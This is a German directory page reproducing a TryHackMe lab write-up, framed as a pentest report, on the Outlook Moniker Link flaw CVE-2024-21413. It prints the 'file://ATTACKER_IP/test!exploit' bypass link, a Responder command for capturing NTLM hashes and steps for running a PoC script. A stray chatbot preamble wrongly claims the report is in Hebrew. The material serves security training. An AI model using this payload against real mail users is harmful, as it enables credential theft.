Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook- — Am 13. Februar 2024 veröffentlichte Microsoft eine schwerwiegende Sicherheitslücke in Microsoft Outlook, die die Kennung CVE-2024-21413 erhielt und unter dem Namen Moniker Link Vulnerability bekannt ist. Die Schwachstelle ermöglicht es einem Angreifer, den Protected View-Mechanismus von Outlook zu umgehen. | Kitploit
Tools/GitHubGitHub/eylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-
SchwachstellenanalyseExploitationPenetrationstestsLernen & BildungE-Mail-SicherheitLabs & Praxis
GitHubeylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

Repository anzeigen
13vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Am 13. Februar 2024 veröffentlichte Microsoft eine schwerwiegende Sicherheitslücke in Microsoft Outlook, die die Kennung CVE-2024-21413 erhielt und unter dem Namen Moniker Link Vulnerability bekannt ist. Die Schwachstelle ermöglicht es einem Angreifer, den Protected View-Mechanismus von Outlook zu umgehen.

Teilen

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

Am 13. Februar 2024 veröffentlichte Microsoft eine schwerwiegende Sicherheitslücke in Microsoft Outlook, die die Kennung CVE-2024-21413 erhielt und unter dem Namen Moniker Link Vulnerability bekannt ist. Die Schwachstelle ermöglicht es einem Angreifer, den Protected-View-Mechanismus von Outlook zu umgehen. Bild

Ausgezeichnet 👍 Im Folgenden finden Sie eine vollständige Übersetzung und Formulierung als Penetrationstest-Bericht (PT) in professionellem und klarem Hebräisch. Wie gewünscht – nur Übersetzung und Formulierung. Die Antworten, Screenshots und Vervollständigungen fügen Sie selbst hinzu, und wenn Sie möchten, helfe ich später.


Penetrationstest-Bericht

CVE-2024-21413 – Moniker Link (Microsoft Outlook)


🧩 Managementübersicht (Executive Summary)

Am 13. Februar 2024 veröffentlichte Microsoft eine schwerwiegende Sicherheitslücke in Microsoft Outlook, die die Kennung CVE-2024-21413 erhielt und unter dem Namen Moniker Link Vulnerability bekannt ist.

Die Schwachstelle ermöglicht es einem Angreifer, den Protected-View-Mechanismus von Outlook mithilfe eines speziellen Links (Moniker Link) zu umgehen und den Outlook-Client des Opfers dazu zu bringen, Anmeldeinformationen (NTLM-Hash) an einen vom Angreifer kontrollierten Server zu senden – ohne eine Datei auszuführen und ohne wirksame Sicherheitswarnung.

Die Schwachstelle kann zu einem Credential-Leak führen, und es besteht theoretisch auch die Möglichkeit einer Remote-Code-Ausführung (RCE).


📌 Details der Schwachstelle

ParameterWert
Schwachstellen-IDCVE-2024-21413
Veröffentlichungsdatum13. Februar 2024
EntdeckerHaifei Li – Check Point Research
AuswirkungCredential-Leak + potenzieller RCE
SchweregradCritical
AngriffskomplexitätNiedrig
CVSS-Score9.8
Offizieller Linkhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413

🎯 Betroffene Versionen

  • Microsoft Office LTSC 2021 – ab Version 19.0.0
  • Microsoft 365 Apps for Enterprise – ab Version 16.0.1
  • Microsoft Office 2019 – ab Version 16.0.1
  • Microsoft Office 2016 – vor Version 16.0.5435.1001

🎓 Lernziele (Learning Objectives)

  • Verstehen der Funktionsweise der Schwachstelle
  • Kennenlernen des Outlook Protected View-Mechanismus
  • Ausnutzen der Schwachstelle zur Offenlegung von Anmeldeinformationen
  • Erkennungsmaßnahmen (Detection)
  • Empfehlungen zur Prävention (Mitigation)

(Schwachstellenbeschreibung)

Bild

Microsoft Outlook ermöglicht die Anzeige von E-Mails im HTML-Format und die Verarbeitung verschiedener Linktypen wie http:// und https://. Darüber hinaus unterstützt Outlook auch spezielle Links namens Moniker Links, die das Starten von Anwendungen oder den Zugriff auf externe Ressourcen im Betriebssystem ermöglichen.

Im Normalzustand, wenn eine E-Mail einen Link enthält, der eine externe Anwendung startet oder auf eine Systemressource zugreift (z. B. einen file://-Link), wird der Protected View-Sicherheitsmechanismus von Outlook aktiviert. Dieser Mechanismus zeigt eine Sicherheitswarnung an und blockiert gefährliche Aktionen wie das Ausführen von Code, Makros oder den Zugriff auf externe Netzwerkressourcen.

Allerdings wurde eine Schwachstelle in Outlook (CVE-2024-21413) gefunden, die es ermöglicht, den Protected View-Mechanismus durch einfache Manipulation eines Moniker Links zu umgehen.

Was wir gefunden haben (Findings)

Während des Tests wurde festgestellt, dass die Verwendung eines normalen Links des Typs:

file://ATTACKER_IP/test

bewirkt, dass Outlook versucht, über das SMB-Protokoll auf eine Netzwerkressource zuzugreifen, dieser Versuch jedoch vom Protected View blockiert wird.

Wenn der Link dagegen das Sonderzeichen ! und eine zusätzliche Textzeichenfolge enthält, zum Beispiel:

file://ATTACKER_IP/test!exploit

führt Outlook den Protected View nicht aus und versucht, eine Verbindung zum Remote-Server herzustellen.

Während dieses Versuchs:

  • Outlook versucht, über SMB auf die Ressource zuzugreifen
  • Eine automatische Authentifizierungsanfrage wird durchgeführt
  • Die Anmeldeinformationen des Benutzers werden an den Angreifer gesendet
  • Der Windows netNTLMv2-Hash des Opfers wird erfasst

Es ist wichtig zu beachten, dass die Remote-Freigabe nicht tatsächlich vorhanden sein muss, da der Authentifizierungsversuch in jedem Fall durchgeführt wird.

Auswirkungen (Impact)

Die Schwachstelle ermöglicht es dem Angreifer:

  • Offenlegung von Benutzeranmeldeinformationen (netNTLMv2-Hash)
  • Durchführung von Offline-Angriffen (Cracking / Pass-the-Hash)
  • Laterale Bewegung im Unternehmensnetzwerk

Darüber hinaus besteht, da Moniker Links den Windows-COM-Mechanismus (Component Object Model) verwenden, die theoretische Möglichkeit einer Remote-Code-Ausführung (RCE). Zum Zeitpunkt des Tests gibt es jedoch keinen öffentlichen Proof of Concept für die tatsächliche Nutzung von RCE durch diese Schwachstelle.

Ausnutzung der Schwachstelle (Exploitation)

Im Rahmen des Angriffs wird dem Opfer eine E-Mail mit einem Moniker Link gesendet, ähnlich dem in der vorherigen Aufgabe gezeigten. Das Ziel des Angreifers ist es, eine E-Mail mit einem Moniker Link zu erstellen, der den Protected View-Mechanismus von Outlook umgeht, sodass der Outlook-Client des Opfers beim Klicken auf den Link versucht, eine Datei von der Maschine des Angreifers zu laden. Dies führt dazu, dass der netNTLMv2-Hash des Opfers gesendet und vom Angreifer erfasst wird.

Vor der Durchführung des Angriffs betrachten wir einen Proof of Concept (PoC), der zu Demonstrationszwecken erstellt wurde (und auch auf GitHub verfügbar ist).

Autor: CMNatic | https://github.com/cmnatic Version: 1.0 | 19/02/2024

Der Code verwendet die Programmiersprache Python und sendet eine HTML-E-Mail mit einem bösartigen Moniker Link.

Beschreibung des PoC

Der PoC:

  • Nimmt eine E-Mail-Adresse des Angreifers und eine E-Mail-Adresse des Opfers entgegen
  • Erfordert ein Passwort für die SMTP-Authentifizierung
  • (In diesem Raum ist das Passwort für [email protected]: attacker)
  • Enthält den HTML-Inhalt der E-Mail (html_content) mit einem bösartigen Moniker Link
  • Legt die E-Mail-Felder fest: Subject, From, To
  • Sendet die E-Mail über den Mailserver

In einem realen Szenario ist ein vom Angreifer kontrollierter SMTP-Server erforderlich (in diesem Raum ist der Server bereits bereitgestellt).

Abhören zum Erfassen des Hashs – Responder

Nach dem Senden der E-Mail muss auf der Maschine des Angreifers ein Abhörwerkzeug wie Responder gestartet werden, um SMB-Anfragen zu erfassen.

In der THM AttackBox lautet der Schnittstellenname ens5:

responder -I ens5

Responder lauscht auf SMB-, LLMNR- und NBT-NS-Anfragen und ermöglicht das Erfassen von Authentifizierungsdaten.

Öffnen der Opfermaschine

Öffnen Sie die Opfermaschine über das Split-Screen-Fenster.

Starten Sie Outlook.

Wählen Sie die Option "I don't want to sign in or create an account".

Schließen Sie das Fenster zur Eingabe des Produktschlüssels.

Das Postfach des Opfers ist bereits vorkonfiguriert.

Ausführen des Exploits

Auf der AttackBox:

Erstellen Sie eine neue Datei namens exploit.py.

Fügen Sie den PoC-Code in die Datei ein.

Vor der Ausführung sind folgende Anpassungen vorzunehmen:

Aktualisieren Sie die IP-Adresse der Angreifermaschine im Moniker Link (Zeile 12).

Ersetzen Sie den Wert MAILSERVER durch die Adresse:

10.64.165.67

Danach führen Sie aus:

python3 exploit.py

Tool herunterladen